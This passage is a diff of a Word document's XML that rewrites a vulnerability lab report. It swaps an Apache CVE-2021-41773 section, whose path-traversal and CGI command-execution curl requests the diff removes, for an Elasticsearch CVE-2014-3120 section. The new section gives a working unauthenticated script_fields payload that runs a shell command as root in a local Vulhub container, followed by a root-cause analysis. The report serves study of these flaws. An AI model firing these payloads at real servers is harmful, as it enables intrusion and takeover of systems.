+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Known exploited</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4677"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Yes — CISA KEV, added 2022-03-25</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3195,14 +3228,14 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">NVD, Apache HTTP Server security page, Vulhub </w:t>
+              <w:t xml:space="preserve">NVD, Elastic security page, Vulhub </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>httpd/CVE-2021-41773</w:t>
+              <w:t>elasticsearch/CVE-2014-3120</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3219,7 +3252,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Apache 2.4.49 introduced a rewritten request-path normaliser. A crafted URL can</w:t>
+        <w:t>Elasticsearch exposes a scripting subsystem: a search request may carry a</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3232,7 +3265,20 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">therefore make the server map a request to a file </w:t>
+        <w:t>script, and the node compiles and evaluates it inside its own JVM. Before 1.2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the default configuration allowed this for </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3240,14 +3286,14 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>outside</w:t>
+        <w:t>every</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the document root</w:t>
+        <w:t xml:space="preserve"> request, with no sandbox</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3260,21 +3306,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">and return it. If </w:t>
+        <w:t xml:space="preserve">and no authentication, so one unauthenticated </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>&lt;Directory /&gt;</w:t>
+        <w:t>POST /_search</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> is permissive, arbitrary files are disclosed;</w:t>
+        <w:t xml:space="preserve"> containing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3284,125 +3330,63 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>java.lang.Runtime.getRuntime().exec(...)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">if CGI is enabled, the same traversal reaches </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> runs a command as the user that</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>started the node — root, in the official image.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>The Vulhub environment for this CVE is exactly that default: a single</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>/bin/sh</w:t>
+        <w:t>vulhub/elasticsearch:1.1.1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> and the request body is</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>executed as a shell script — remote code execution.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>The Vulhub environment for this CVE ships exactly that configuration: 2.4.49</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>mod_cgi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>mod_cgid</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> enabled and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>&lt;Directory /&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> relaxed to</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Require all granted</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> container on port 9200.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3458,11 +3442,11 @@
         </w:rPr>
         <w:t>$ cd vulnerability/vulnerable</w:t>
         <w:br/>
-        <w:t>$ docker compose up --build -d</w:t>
+        <w:t>$ docker compose up -d</w:t>
         <w:br/>
-        <w:t>$ curl -s http://127.0.0.1:8080/</w:t>
+        <w:t>$ curl -s http://127.0.0.1:9200/</w:t>
         <w:br/>
-        <w:t>It works!</w:t>
+        <w:t>"number" : "1.1.1"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3475,7 +3459,7 @@
           <w:color w:val="000000"/>
           <w:sz w:val="23"/>
         </w:rPr>
-        <w:t>6.1 File disclosure</w:t>
+        <w:t>6.1 Index one document</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3489,78 +3473,14 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>$ curl -v --path-as-is \</w:t>
+        <w:t>$ curl -s -XPUT 'http://127.0.0.1:9200/blog/post/1' \</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
+        <w:t xml:space="preserve">      -H 'Content-Type: application/json' -d '{"title":"hello"}'</w:t>
         <w:br/>
-        <w:t>&lt; HTTP/1.1 200 OK</w:t>
+        <w:t>{"_index":"blog","_type":"post","_id":"1","_version":1,"created":true}</w:t>
         <w:br/>
-        <w:t>...</w:t>
         <w:br/>
-        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
-        <w:br/>
-        <w:t>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>--path-as-is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is essential: otherwise curl normalises </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.%2e/…</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> into </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>../</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the client and the request never reaches the vulnerable code path.</w:t>
+        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/blog/_refresh'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3573,7 +3493,7 @@
           <w:color w:val="000000"/>
           <w:sz w:val="23"/>
         </w:rPr>
-        <w:t>6.2 Remote code execution</w:t>
+        <w:t>6.2 Make the search API execute Java</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3587,15 +3507,13 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>$ curl -v --data 'echo;id' \</w:t>
+        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/_search' -H 'Content-Type: application/json' -d '{</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
+        <w:t xml:space="preserve">    "size":1,"query":{"match_all":{}},</w:t>
         <w:br/>
-        <w:t>&lt; HTTP/1.1 200 OK</w:t>
+        <w:t xml:space="preserve">    "script_fields":{"pwn":{"script":"java.lang.Runtime.getRuntime().exec(new String[]{\"sh\",\"-c\",\"id &gt; /tmp/pwned.txt\"})"}}</w:t>
         <w:br/>
-        <w:t>...</w:t>
-        <w:br/>
-        <w:t>uid=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
+        <w:t xml:space="preserve">  }'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3605,130 +3523,122 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>The response is an ordinary hit list, but the computed field is a process:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="160"/>
+        <w:ind w:left="227"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>{"hits":{"total":1,"hits":[{"_index":"blog","_type":"post","_id":"1",</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  "fields":{"pwn":["java.lang.UNIXProcess@4de0408b"]}}]}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="23"/>
+        </w:rPr>
+        <w:t>6.3 Prove the command ran</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="160"/>
+        <w:ind w:left="227"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>$ docker compose exec -T es cat /tmp/pwned.txt</w:t>
+        <w:br/>
+        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Both requests were executed against the running container on this machine; the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">exact responses are in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>echo;</w:t>
+        <w:t>reports/cve-2014-3120-all.log</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> terminates the CGI response headers so that </w:t>
-      </w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>id</w:t>
+        <w:t xml:space="preserve">[[SCREENSHOT: terminal – curl _search returning UNIXProcess + </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> output is visible in</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the body.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Both attacks were executed against the running container on this machine; the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">exact status lines, </w:t>
+        <w:t>uid=0(root)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>Server: Apache/2.4.49</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> headers and bodies are stored in</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>reports/cve-41773-phase1.log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: terminal – curl traversal returning root:x:0:0]]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: terminal – curl CGI returning uid=1(daemon)]]</w:t>
+        <w:t xml:space="preserve"> inside the container]]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3754,35 +3664,95 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Apache 2.4.49 removed the old </w:t>
+        <w:t>Elasticsearch's scripting feature lets a query compute values on the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>The design intent was convenience ("score boost", "script fields"); the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>security model was that the node is trusted and the client is not — except</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>nothing enforced that.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Dangerous default.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>ap_getparents()</w:t>
+        <w:t>script.disable_dynamic</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
+        <w:t xml:space="preserve"> defaulted to </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>ap_no2slash()</w:t>
+        <w:t>false</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> helpers and</w:t>
+        <w:t xml:space="preserve"> before</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3795,45 +3765,113 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">replaced them with a single </w:t>
+        <w:t>1.2, so any script in a request body was compiled and executed. The only</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">barrier between an attacker and </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>ap_normalize_path()</w:t>
+        <w:t>Runtime.getRuntime()</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> used by</w:t>
+        <w:t xml:space="preserve"> was the JSON parser.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>No sandbox.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> In 1.0/1.1 the MVEL expression is evaluated with full Java</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="120"/>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">reflection available. A scripting engine without a class filter is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>ap_core_translate()</w:t>
-      </w:r>
+        <w:t>eval()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>. The new function walks the URL segment by segment and</w:t>
+        <w:t>for Java; the language choice (MVEL, then Groovy) changes nothing.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>No authentication.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Elasticsearch 1.x has no users, roles or TLS, and the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="120"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -3842,7 +3880,404 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>refuses to let the path climb above the request root:</w:t>
+        <w:t xml:space="preserve">image binds </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>0.0.0.0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. The CVSS vector lists </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>PR:L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> because the vendor treats</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
